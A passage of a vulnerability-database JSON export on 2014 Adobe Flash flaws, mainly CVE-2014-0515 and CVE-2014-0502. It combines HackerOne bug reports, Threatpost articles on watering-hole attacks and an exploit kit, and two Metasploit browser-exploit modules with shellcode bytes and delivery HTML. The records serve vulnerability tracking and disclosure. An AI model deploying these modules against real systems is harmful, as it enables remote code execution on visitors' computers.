name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-09-04T00:48:02", "bounty": 0.0, "description": "The proof of concept attached will exploit the implementation of flash in some browsers that will bypass the local-with-fileaccess sandbox. By encoding in ignored file:// uri characters, and navigating to another page with a decoder script. one is able to read arbitrary files AND parse it to the parent page, bypassing the local sandbox. \r\nThe flash applet has a default mode in which it will parse file content and another mode (by setting flashvars) that will parse the length of the content of a file. And iframe within those 2 makes sure that the original window is persistent and the applet in the iframe will only move the iframe, the data is then passed by localstorage, and if recieved by poc.html, the iframe is reset.\r\nA quick overview of what the poc is doing, in which order.\r\n-Determine the length of the content from the file through the flash applet with mode 2\r\n-Determine the maximum amount of space which can be used for leaking the data (chrome uses a max of 260)\r\n-Since every character uses 8 bits, divide that amount by 8, set as maximum chars in one 'transmission'.\r\n-Determine how much 'transmissions are needed' to get the entire file\r\n-Walk through file to get the entire file by appending all requested parts to variable 'total'\r\n-Call whatever callback function back.\r\n\r\n\r\nDemonstrated in poc2.html:\r\n-The impact of this attack is increased by the ability to download arbitrary remote files (Cross origin) by systematically downloading those files to a know predictable location. (using the download= attribute in a <a >tag). This link will be automatically clicked. Now as long as the user is opening the file from a Drive:/User/Username location. 
We can simply predict the path to read the downloaded file on windows vista+ (Or any other OS with a default download folder for that matter).\r\n-This stage of exploitation enables an attacker to access a file with the auth of the user the following 'attack use cases' arise:\r\n1. Attacker could access and send users web-mail to his sown erver. (try using 'https://mail.google.com/mail/u/0/feed/atom' in poc2 while logged in with gmail)\r\n2. Attacker could get XSRF-tokens. To bypass such protections.\r\nI could imagine there are countless other possibilities. \r\n-You might notice that loading the Hackerone page is painfully slow. However, In targeted attacks a attacker could filter the desirable data in the flash applet itself.\r\n\r\n\r\n\r\nNow for the exploit itself, I acknowledge that the exploit might look very complex.\r\nWhich is why I added a 'frontend' that is tested under the following conditions.\r\nOS:Windows 8\r\nBrowser: Google Chrome 32.0.1700.107 m", "cvss3": {}, "published": "2014-02-21T01:47:59", "type": "hackerone", "title": "Internet Bug Bounty: Flash local-with-fileaccess Sandbox Bypass", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-17T00:41:53", "id": "H1:2140", "href": "https://hackerone.com/reports/2140", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-04T00:49:56", "bounty": 2000.0, "description": "*This bug was reported directly to 
Adobe.*\n\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-08.html\n", "cvss3": {}, "published": "2014-03-11T00:00:00", "type": "hackerone", "title": "Internet Bug Bounty: Same Origin Security Bypass Vulnerability", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2014-03-11T00:00:00", "id": "H1:6380", "href": "https://hackerone.com/reports/6380", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-04T00:55:02", "bounty": 0.0, "description": "This bug was reported directly to Adobe and got assigned CVE-2014-0502.\r\n\r\nhttp://helpx.adobe.com/security/products/flash-player/apsb14-07.html\r\n\r\nThis one was actively (and it still is) exploited since February 12th in watering hole campaigns against nonprofit research institutions and human right activists websites.\r\n\r\nIf I can get a reward for this vulnerability, I'd be happy to give it to charity!", "cvss3": {}, "published": "2014-02-21T20:37:47", "type": "hackerone", "title": "Internet Bug Bounty: Flash double free vulnerability leads to code execution", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-27T21:44:27", "id": "H1:2170", "href": "https://hackerone.com/reports/2170", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:59:20", "description": "Adobe rushed out an [unscheduled Flash Player update](<http://helpx.adobe.com/security/products/flash-player/apsb14-07.html>) today to counter exploits of a zero-day vulnerability in the software.\n\nA number of national security, foreign policy and public policy websites are hosting exploits that redirect to espionage malware, including the Peter G. Peterson Institute for International Economics, the American Research Center in Egypt and the Smith Richardson Foundation.\n\nThose three nonprofit sites, researchers at FireEye said, are redirecting visitors to an exploit server hosting variants of the PlugX remote access Trojan. FireEye calls the campaign [Operation GreedyWonk](<http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html>).\n\n\u201cThis threat actor clearly seeks out and compromises websites of organizations related to international security policy, defense topics, and other non-profit sociocultural issues,\u201d FireEye wrote in an advisory today. \u201cThe actor either maintains persistence on these sites for extended periods of time or is able to re-compromise them periodically.\u201d\n\nThe hackers behind this campaign have resources that include access to Flash and Java zero-day exploits, FireEye said. 
They are targeting visitors who use these websites as a resource and those visitors are likely government or embassy employees who are at risk for data loss.\n\nAdobe\u2019s update today is for Flash Player 12.0.0.44 and earlier for Windows and Macintosh, and Flash 11.2.202.336 for Linux. CVE-2014-0502 has been assigned to this vulnerability. FireEye said that the exploit targets Windows XP users, as well as Windows 7 users running an unsupported version of Java (1.6) or out of date versions of Microsoft Office 2007 or 2010. The vulnerability enables someone to remotely overwrite the vftable pointer of a Flash object to redirect code execution.\n\nThe exploit is using the Adobe Flash vulnerability to bypass ASLR and DEP protections native to Windows. It does so by building or using hard-coded return-oriented programming chains in XP and Windows 7 respectively. Upgrading to the latest versions of Java (1.7) or Office will mitigate the threat, but not patch the underlying vulnerability, FireEye said.\n\n\u201cBy breaking the exploit\u2019s ASLR-bypass measures, they do prevent the current in-the-wild exploit from functioning,\u201d FireEye said.\n\nThe hackers are installing the PlugX/Kaba RAT on infected computers; the sample FireEye reported was found on Feb. 13 and compiled the day before, an indication it was purpose-built for these targets. The RAT calls out to three command and control domains, one of which, wmi.ns01[.]us, has been used in other campaigns involving PlugX and the Poison Ivy RAT. 
Some of the older Poison Ivy samples were found in attacks involving Flash exploits and similar defense and policy websites, including the Center for Defense Information and another using a Java exploit against the Center for European Policy Studies.\n\nToday\u2019s out of band patch is the [second one for Flash this month](<http://threatpost.com/emergency-adobe-update-patches-flash-zero-day/104044>).\n", "cvss3": {}, "published": "2014-02-20T13:31:28", "type": "threatpost", "title": "Emergency Adobe Flash Update Handles Zero Day Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-24T17:07:03", "id": "THREATPOST:CB12314D0425200AD8F701D46E53BFE9", "href": "https://threatpost.com/emergency-adobe-flash-update-handles-zero-day-under-attack/104387/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:57", "description": "A couple days after Microsoft warned users about a [new vulnerability in Internet Explorer](<https://threatpost.com/new-internet-explorer-cve-2014-1776-zero-day-used-in-targeted-attacks/105720>) that\u2019s being used in targeted attacks, Adobe on Monday said that researchers have discovered a zero day in Flash, as well, which attackers are using to target victims in Syria through a watering hole attack on a compromised Syrian government site.\n\nThe Adobe Flash zero day was first identified in early April by researchers at Kaspersky Lab, who say that there are at least two separate exploits in use right now.\n\nThe attacks are linked to a site owned by the Syrian government, which is being used as a watering hole to target a certain subset of visitors.\n\nThe site apparently was compromised in September and hasn\u2019t been cleaned.\n\n\u201cBoth the exploits detected by us spread from a site located at http://jpic.gov.sy/. 
The site was launched back in 2011 by the Syrian Ministry of Justice and was designed as an online forum for citizens to complain about law and order violations. We believe the attack was designed to target Syrian dissidents complaining about the government,\u201d Vyacheslav Zakorzhevsky, head of the vulnerability research group at Kaspersky Lab, wrote in an [analysis of the Flash CVE-2014-0515 vulnerability](<https://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks>).\n\n**\u201c**When we entered the site, the installed malware payloads were already missing from the \u201c_css\u201d folder. We presume the criminals created a folder whose name doesn\u2019t look out of place on an administration resource, and where they loaded the exploits. The victims were probably redirected to the exploits using a frame or a script located at the site. To date, April 28, the number of detections by our products has exceeded 30. They were detected on the computers of seven unique users, all of them in Syria, which is not surprising considering the nature of the site. Interestingly, all the attacked users entered the website using various versions of Mozilla Firefox.\u201d\n\nAdobe has issued a [patch for the vulnerability](<http://helpx.adobe.com/security/products/flash-player/apsb14-13.html>), and is encouraging users on Windows and OS X to update immediately. The current attacks target Windows users, but that could change.\n\nThere are two exploits for the CVE-2014-0515 vulnerability, and Zakorzhevsky said that both exploits come in the form of unpacked video files. Kaspersky Lab first received the exploit samples in the second week of April, but data shows that customers first began seeing exploit attempts several days earlier.\n\n\u201cAccording to KSN data, these exploits were stored as movie.swf and include.swf at an infected site. The only difference between the two pieces of malware is their shellcodes. 
It should be noted that the second exploit (include.swf) wasn\u2019t detected using the same heuristic signature as the first, because it contained a unique shellcode,\u201d Zakorzhevsky said.\n\n\u201cAs is usually the case with this kind of exploit, the first stage is a heap spray \u2013 preparing the dynamic memory for exploitation of the vulnerability. The exploits are also designed to check the OS version \u2013 if Windows 8 is detected, a slightly modified byte-code of the Pixel Bender component is used.\u201d\n\nOne of the exploits searches for a specific Cisco extension that\u2019s related to the company\u2019s MeetingPlace software. If that extension isn\u2019t present, the exploit won\u2019t work.\n\n\u201cWe are sure that all these tricks were used in order to carry out malicious activity against a very specific group of users without attracting the attention of security solutions. We believe that the Cisco add-in mentioned above may be used to download/implement the payload as well as to spy directly on the infected computer,\u201d Zakorzhevsky said.\n\nResearchers believe that the operation and the exploits are likely the work of high-level attackers. At this point, Kaspersky Lab has only seen about 30 infection attempts using these exploits.\n\n\u201cIt\u2019s likely that the attack was carefully planned and that professionals of a pretty high caliber were behind it. 
The use of professionally written 0-day exploits that were used to infect a single resource testifies to this,\u201d Zakorzhevsky said.\n", "cvss3": {}, "published": "2014-04-28T11:43:40", "type": "threatpost", "title": "Flash Zero Day Used to Target Victims in Syria", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0515", "CVE-2014-1776"], "modified": "2014-04-28T20:50:55", "id": "THREATPOST:EFA43E4E6094B0AB8E3B2C61175EF431", "href": "https://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:09", "description": "A relatively new exploit kit that borrows modules copied from the Metasploit Framework and exploits any older versions of Adobe Flash, Reader, and Silverlight the user may be using has begun to make the rounds.\n\nJaime Blasco, the director of AlienVault Labs, dug deeper into the kit, known as Archie, on the [company\u2019s blog yesterday](<http://www.alienvault.com/open-threat-exchange/blog/archie-just-another-exploit-kit>).\n\nFirst discovered by [EmergingThreats in August](<http://emergingthreats.net/daily-ruleset-update-summary-08132014/>), Archie is apparently one of the more basic exploit kits on the market.\n\n\u201cWhen the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information,\u201d Blasco says, regarding Archie\u2019s functionality.\n\nIn addition to Flash and Reader, the kit also checks victims\u2019 machines to see if they\u2019re running a 64-bit version of Internet Explorer.\n\nIf caught running an outdated version of Flash it will load one of two exploits, including CVE-2014-0497, a zero day that hackers used to deploy password-grabbing Trojans in China [back in February](<http://threatpost.com/details-emerge-on-latest-adobe-flash-zero-day-exploit/104068>). 
Hackers used the other Flash exploit the kit employs, CVE-2014-0515, in attacks against Syrians [in April](<http://threatpost.com/flash-zero-day-used-to-target-victims-in-syria/105726>).\n\nThe IE vulnerability it checks for, [CVE-2013-2551](<http://threatpost.com/microsoft-patches-department-of-labor-pwn2own-ie-vulnerabilities>), is the same use-after-free memory corruption vulnerability that VUPEN dug up at Pwn2Own 2013.\n\nThe Silverlight vulnerability Archie exploits is an old one as well. Although it was patched in March 2013, the kit still exploits the vulnerability, [CVE-2013-0074](<http://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), which targets Silverlight 5 and opens systems running it to remote code execution.\n\n\u201cArchie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them,\u201d Blasco wrote.\n\nThe shellcode then kickstarts a basic download and execute payload, which Blasco said comes from the same IP address as one being used for a .NET click fraud bot.\n\nA bevy of new exploit kits have been circulating in the 10 or so months since authorities in Russia [arrested Paunch](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), the Blackhole Exploit Kit\u2019s creator. [Blackhole and Cool](<http://threatpost.com/blackhole-and-cool-exploit-kits-nearly-extinct/103034>), another Exploit Kit assumed to have been crafted by Paunch, dissolved soon after.\n\nMalicious ads on Yahoo were found linking European users to one of those kits, Magnitude, in January while this summer, men\u2019s lifestyle site AskMen.com was spotted directing users to the Nuclear Pack Exploit Kit.\n\nArchie joins another exploit kit, Angler, in targeting Silverlight vulnerabilities. Silverlight, Microsoft\u2019s app framework, is perhaps best known for powering media streaming services like Netflix. 
[Java.com and TMZ.com](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) were found sending users to sites peddling Angler last month.\n", "cvss3": {}, "published": "2014-09-16T17:25:57", "type": "threatpost", "title": "Archie Exploit Kit Spotted Leveraging Adobe, Silverlight Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0074", "CVE-2013-2551", "CVE-2014-0497", "CVE-2014-0515"], "modified": "2014-09-16T21:25:57", "id": "THREATPOST:9928E4032CF09647D7486B6AB9996982", "href": "https://threatpost.com/archie-exploit-kit-targets-adobe-silverlight-vulnerabilities/108317/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2023-06-22T02:54:52", "description": "", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player - Shader Buffer Overflow (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2014-0515", "CVE-2014-0515"], "modified": "2014-05-12T00:00:00", "id": "EDB-ID:33333", "href": "https://www.exploit-db.com/exploits/33333", "sourceData": "##\n# This module requires Metasploit: http//metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\n\nclass Metasploit3 < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n 
super(update_info(info,\n 'Name' => \"Adobe Flash Player Shader Buffer Overflow\",\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\n vulnerability occurs in the flash.Display.Shader class, when setting specially\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\n has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over\n Windows XP SP3, Windows 7 SP1 and Windows 8.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2014-0515'],\n ['BID', '67092'],\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2000,\n 'DisableNops' => true,\n 'PrependEncoder' => stack_adjust\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'migrate -f',\n 'Retries' => false,\n 'EXITFUNC' => \"thread\"\n },\n 'Platform' => 'win',\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :clsid => \"{D27CDB6E-AE6D-11cf-96B8-444553540000}\",\n :method => \"LoadMovie\",\n :os_name => Msf::OperatingSystems::WINDOWS,\n :ua_name => Msf::HttpClients::IE,\n :flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') }\n },\n 'Targets' =>\n [\n [ 'Automatic', {} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Apr 28 2014\",\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def stack_adjust\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\n adjust << 
\"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\n adjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\n\n adjust\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status(\"Sending SWF...\")\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status(\"Sending HTML...\")\n tag = retrieve_tag(cli, request)\n profile = get_profile(tag)\n profile[:tried] = false unless profile.nil? # to allow request the swf\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n flash_payload = \"\"\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\n flash_payload << \"0x#{i.to_s(16)},\"\n end\n flash_payload.gsub!(/,$/, \"\")\n\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=flash_payload%>\" />\n <param name=\"Play\" value=\"true\" />\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0515\", \"Graph.swf\" )\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\n\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/33333.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}